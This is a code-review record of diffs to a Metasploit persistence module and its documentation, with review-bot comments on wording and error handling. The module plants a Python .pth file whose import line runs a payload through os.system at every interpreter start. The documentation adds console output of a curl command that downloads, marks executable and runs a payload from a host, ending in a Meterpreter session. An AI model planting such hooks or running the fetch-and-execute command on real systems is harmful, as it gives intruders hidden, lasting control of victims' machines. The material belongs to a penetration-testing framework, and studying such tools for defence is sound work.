diff --git a/documentation/modules/exploit/multi/persistence/python_site_specific_hook.md b/documentation/modules/exploit/multi/persistence/python_site_specific_hook.md index 8aae87977d..2bbc24f725 100644 --- a/documentation/modules/exploit/multi/persistence/python_site_specific_hook.md +++ b/documentation/modules/exploit/multi/persistence/python_site_specific_hook.md 
@@ -1,44 +1,67 @@ -The following is the recommended format for module documentation. But feel free to add more content/sections to this. -One of the general ideas behind these documents is to help someone troubleshoot the module if it were to stop -functioning in 5+ years, so giving links or specific examples can be VERY helpful. - ## Vulnerable Application -Instructions to get the vulnerable application. If applicable, include links to the vulnerable install -files, as well as instructions on installing/configuring the environment if it is different than a -standard install. Much of this will come from the PR, and can be copy/pasted. +This module leverages Python's startup mechanism, where some files can be automically processed during the initialization of the Python interpreter. One of those files are startup hooks (site-specific, dist-packages). If these files are present in `site-specific` or `dist-packages` directories, any lines beginning with `import` will be executed automatically. This creates a persistence mechanism, if an attacker has established access to target machine with sufficient permissions. ## Verification Steps Example steps in this format (is also in the PR): -1. Install the application + 1. Start msfconsole -1. Do: `use [module path]` +1. Get a session +1. Do: `use multi/persistence/python_site_specific_hook` +1. Do: `set session #` 1. Do: `run` -1. You should get a shell. ## Options -List each option and how to use it. -### Option Name +### PYTHON_HOOK_PATH -Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here. +If user has session to target machine with non-typical Python paths, they can set their own path to Python hooks. + +### EXECUTION_TARGET + +Python has multiple locations, where it can store startup hooks. This option specifies if the target location should be SYSTEM one - i.e. should affect all users - or USER one, which targets current user. 
## Scenarios -Specific demo of using the module that might be useful in a real world scenario. -### Version and OS +### Linux pop-os 6.17.4-76061704-generic ``` -code or console output -``` +msf exploit(multi/persistence/python_site_specific_hook) > run verbose=true +[*] Command to run on remote host: curl -so ./xtLDGMnHcvHv http://192.168.3.7:8080/EO6WzfXF6CGyqdBiy1rT5w;chmod +x ./xtLDGMnHcvHv;./xtLDGMnHcvHv& +[*] Exploit running as background job 9. +[*] Exploit completed, but no session was created. -For example: +[*] Fetch handler listening on 192.168.3.7:8080 +[*] HTTP server started +[*] Adding resource /EO6WzfXF6CGyqdBiy1rT5w +msf exploit(multi/persistence/python_site_specific_hook) > [*] Running automatic check ("set AutoCheck false" to disable) +[+] The target is vulnerable. Python is present on the system +[*] Detected Python version 3.10 +[*] Got path to site-specific hooks /usr/local/lib/python3.10/dist-packages/ +[*] Creating directory /usr/local/lib/python3.10/dist-packages/ +[*] /usr/local/lib/python3.10/dist-packages/ created +[*] Client 192.168.3.7 requested /EO6WzfXF6CGyqdBiy1rT5w +[*] Sending payload to 192.168.3.7 (curl/7.81.0) +[*] Transmitting intermediate stager...(126 bytes) +[*] Sending stage (3090404 bytes) to 192.168.3.7 +[*] Meterpreter session 4 opened (192.168.3.7:4444 -> 192.168.3.7:34170) at 2025-11-19 07:04:54 +0100 -To do this specific thing, here's how you do it: +msf exploit(multi/persistence/python_site_specific_hook) > sessions 4 +[*] Starting interaction with 4... + +meterpreter > sysinfo +Computer : 172.16.187.129 +OS : Pop 22.04 (Linux 6.17.4-76061704-generic) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > getuid +Server username: ms ``` -msf > use module_name -msf auxiliary(module_name) > set POWERLEVEL >9000 -msf auxiliary(module_name) > exploit + +### Windows 10.0.15063 +``` + ``` 
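Review bot: the new description in this documentation hunk refers to "site-specific" and "dist-packages" directories, but the directory Python's `site` module actually scans is `site-packages` (Debian/Ubuntu use `dist-packages`), and the mechanism is `.pth` files placed there, in which only lines beginning with `import` are executed; since the stated purpose of these documents is to let someone troubleshoot the module years later, say `.pth` files in `site-packages`/`dist-packages` explicitly rather than "site-specific", which is not a directory name. In the same paragraph, "automically" should read "automatically" and "One of those files are startup hooks" should read "One of those files is". The Verification Steps section still carries the template line "Example steps in this format (is also in the PR):", which should be dropped, and the "### Windows 10.0.15063" scenario is an empty fenced block: either paste the Windows run or remove the heading, as an empty block documents nothing and suggests the Windows path was not exercised. For PYTHON_HOOK_PATH, showing the default value (the Linux run prints `/usr/local/lib/python3.10/dist-packages/`) would help a user decide when to override it, and a note that the trailing `/` matters would match how the module concatenates the file name onto this path.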
diff --git a/modules/exploits/multi/persistence/python_site_specific_hook.rb b/modules/exploits/multi/persistence/python_site_specific_hook.rb index bf0768e877..9afdd8e244 100644 --- a/modules/exploits/multi/persistence/python_site_specific_hook.rb +++ b/modules/exploits/multi/persistence/python_site_specific_hook.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Local info, 'Name' => 'Python Site-Specific Hook Persistence', 'Description' => %q{ - TODO + This module leverages Python's startup mechanism, where some files can be automically processed during the initialization of the Python interpreter. One of those files are startup hooks (site-specific, dist-packages). If these files are present in site-specific or dist-packages directories, any lines beginning with import will be executed automatically. This creates a persistence mechanism, if an attacker has established access to target machine with sufficient permissions. }, 'License' => MSF_LICENSE, 'Author' => [ @@ -101,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Local file_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(5..10) if session.platform == 'osx' || session.platform == 'linux' - cmd_exec("mkdir -p #{@hooks_path}") + mkdir(@hooks_path) end fail_with(Failure::PayloadFailed, 'Failed to create malicious hook') unless write_file("#{@hooks_path}#{file_name}.pth", %(import os;os.system("#{payload.encoded}") ))
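Review bot: the replacement Description in the first hunk of this file repeats the wording defects of the documentation text ("automically", "One of those files are", "site-specific" where Python's directory is `site-packages`/`dist-packages`); this string is what `info` shows an operator, so fix it here too, and name the artifact the module leaves behind (a `.pth` file in the hook directory whose `import` line runs the payload via `os.system`) so that cleanup after an engagement is unambiguous.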
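Review bot: in the second hunk of this file the return value of `mkdir(@hooks_path)` is not checked, so if the directory cannot be created (for example, no write access to a system-wide `dist-packages` path when EXECUTION_TARGET is SYSTEM) the failure only surfaces at `write_file` with the message "Failed to create malicious hook", which points the operator at the wrong cause; guard the call with `directory?(@hooks_path)` afterwards, or check the result, and `fail_with` a message that names the directory. The file path on the following line, `"#{@hooks_path}#{file_name}.pth"`, is built by plain concatenation and therefore relies on `@hooks_path` ending in a separator; that holds for the default shown in the docs but breaks silently for a user-supplied PYTHON_HOOK_PATH without a trailing `/` (or `\` on Windows, which this branch does not create at all), so normalise the separator once when `@hooks_path` is set rather than assuming it here.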